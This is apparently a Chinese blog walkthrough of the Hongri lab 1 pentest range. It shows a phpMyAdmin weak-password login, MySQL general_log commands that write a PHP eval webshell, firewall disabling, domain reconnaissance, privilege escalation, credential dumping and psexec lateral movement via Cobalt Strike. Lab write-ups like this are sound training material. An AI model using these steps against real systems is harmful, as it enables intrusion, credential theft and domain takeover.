当前位置: 首页 > news >正文

红日靶场1渗透

环境配置

给win2008、win2003和win7配置一个192.168.52.0网段的网卡,win7额外配置一个网卡,充当外网网卡

这里nat是外网网卡,vmnet1是内网网卡

然后登录win7,密码是hongrisec@2019,登陆后提示密码过期,随便改一个密码,比如admin@123

本地连接5是内网的网卡

在控制面版找到网络连接,将首选dns改为192.168.52.138,IP地址如果不是对应外网网卡的网段可以手动配置。我的nat网段是192.168.14.0,我这里最开始没有自动分配192.168.14.0网段,所以选择手动配置

执行

net group "domain controllers" /domain

看看能不能向域控请求,如果出现发生系统错误5 。拒绝访问那就重装win7

完成之后打开c盘的phpstudy

环境搭建完毕

外网渗透


目录扫描

开启80和3306

远程连接3306,连接不上

对http页面扫描目录,发现了phpmyadmi,

使用弱口令root/root登录

写入一句话木马

root权限登录,看看能不能直接写一个一句话木马

SHOW VARIABLES LIKE 'secure_file_priv';

不能直接写入文件,使用日志功能getshell

查看是否开启日志

show variables like 'general_log';

开启日志

set global general_log=on;

再次查看是否开启

查看日志保存位置

show variables like 'general_log_file';

修改日志保存位置为WWW目录下

set global general_log_file='C:\\phpStudy\\WWW\\mm.php';

查看日志输出类型

show variables like 'log_output';

此时再执行

select '<?php @eval($_POST[cmd]);?>';

即可将一句话木马写入

使用蚁剑连接

内网渗透


内网信息收集

参看当前用户

查看有无杀软

https://www.ddosi.org/av/

tasklist /svc

关闭防火墙

netsh advfirewall set allprofiles state off

上传cs后门程序,上线cs

查看网络信息

ipconfig /all

查看域

net view /domain

查看系统信息

systeminfo

查看域控机器名

net group "domain controllers" /domain

查看当前机器与其他机器通信情况

arp -a

至此可以知道域控IP是192.168.52.138,域控机器名是OWA,并且当前用户是在域内的,只加入了一个域,除了域控和本机,还有一个192.168.52.141。最重要的是用户权限是域管权限

接下来查看域管理员成员

net group "Domain Admins" /domain

查看本地管理员组

net localgroup administrators

已经是域管了,不用考虑其他用户了

域管默认可以连接ipc

查看域控ipc共享文件

net view \\192.168.52.138

查看当前会话

qwinsta /server:localhost

权限提升

接下来提权,抓取密码,根据前面systeminfo去查找提权exp,可以找到很多提权漏洞

使用ms14-058、ms16-075都可以提权

横向移动

使用插件抓取密码

可以直接获取明文密码,接下来使用psexec横向移动

因为内网的机器不能出网,需要通过入口机上线cs,这里可以在cs中选择代理转发中的转发上线

监听主机选择跳板机与域控通信的内网IP,打开监听器,可以看到多了一个监听

在横向前需要在cs上扫描内网机器,选择网络探测

此时点击小电脑,就可以看到扫描的结果,域内几台机器

右键选择横向移动、psexec

将获得的信息填入,监听选择跳板windows_dc

等待一会,就可以上线域控

同样方法,选择另一台机器机器

成功上线

http://www.jsqmd.com/news/453705/

相关文章:

  • 2026年净化板厂家实力推荐榜:手工/机制/岩棉/玻镁岩棉净化板,精选优质品牌与技术创新深度解析 - 品牌企业推荐师(官方)
  • 关于验证码生成的接口实例
  • 国产烟尘测试仪知名企业盘点,4家优质厂家榜单,附评分推荐 - 品牌推荐大师1
  • ASM路由配置
  • 5K臻出彩,双模新体验!飞利浦5K双模商用显示器34B2U5900C重磅来袭
  • 2026年香港靠谱的清水楼装修专业公司推荐,解决客户装修核心痛点 - 工业品网
  • 初识C语言
  • 2026年推荐一下性价比高的AI搜索优化公司靠谱吗 - 工业设备
  • 2026盐城环保机械哪家口碑好,百利豪机械创新能力怎么样产品全吗 - myqiye
  • ##ASM路由配置
  • 解读2026年口碑好的建筑装饰培训机构,贵阳地区推荐哪家 - 工业品牌热点
  • 【2026年最新600套毕设项目分享】springboot基于线性回归的音乐推荐系统(14090)
  • 实测3种携程任我行卡回收方法,安心又省心 - 京回收小程序
  • LangChain 多智能体 (Multi-Agent) 完整文档分析
  • 【水果识别系统】实现~Python+深度学习+人工智能+算法模型+图像识别+2026原创
  • 2026 唯品会购物消费额度安全使用指南:防骗技巧与账户保护 - 容易提小溪
  • 2025年中国独角兽企业全景报告:城市分布、赛道格局与发展趋势
  • 探路者完成收购通途半导体 抢占AI算力黄金赛道
  • 帛书《周易》“羅”象不是《易经》“离”卦
  • 2026年 膜结构停车棚厂家推荐排行榜,充电桩棚/双开停车棚/汽车棚/非机动车棚/景观棚,创新设计与耐用品质全景解析 - 品牌企业推荐师(官方)
  • 智慧校园安全监测 教师人员行为监测 目标检测图像数据集 手机数据集 雨伞识别数据集 人员持刀数据集 持枪图像检测数据集第10071期
  • 2026年地埋BDF水箱企业推荐与评测,直击耐压与定制痛点 - 深度智识库
  • 计算机毕业设计java基于MVC的社区党建信息系统的设计与实现 基于SpringBoot的社区党建数字化管理平台设计与实现基层党务工作信息化管理系统研发
  • 【2026年最新600套毕设项目分享】springboot基于新疆特色文化在线教育平台(14089)
  • 基于Python酒店评论情感分析与可视化系统 【附源码】
  • GD32 ADC外设学习笔记
  • 创新技术+硬核管线:创胜集团价值凸显
  • 【GaussDB】排查ARM64环境上gaussdb的python驱动(psycopg3)coredump的问题
  • 基于Chrome140的Telegram账号自动化——运行脚本(三)
  • 从数据到决策:土壤墒情监测站如何指导科学灌溉